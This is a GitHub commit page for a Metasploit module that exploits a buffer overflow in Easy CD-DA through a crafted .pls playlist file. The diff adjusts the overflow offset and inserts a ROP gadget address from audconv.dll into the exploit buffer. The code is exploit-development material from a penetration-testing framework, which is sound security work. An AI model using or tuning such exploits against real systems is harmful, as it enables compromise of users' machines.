We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 11513d9 commit 9845970Copy full SHA for 9845970
modules/exploits/windows/fileformat/easycdda_pls_bof.rb
@@ -54,7 +54,7 @@ def initialize(info = {})
54
# easycdda.exe 3.0.114.0
55
# audconv.dll 7.0.815.0
56
{
57
- 'Offset' => 1112,
+ 'Offset' => 1108,
58
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
59
}
60
]
@@ -105,6 +105,7 @@ def exploit
105
].flatten.pack('V*')
106
107
sploit = rop_nops(target['Offset'] / 4)
108
+ sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
109
sploit << [target.ret].pack("V")
110
sploit << rop_nops(22)
111
sploit << rop_gadgets
0 commit comments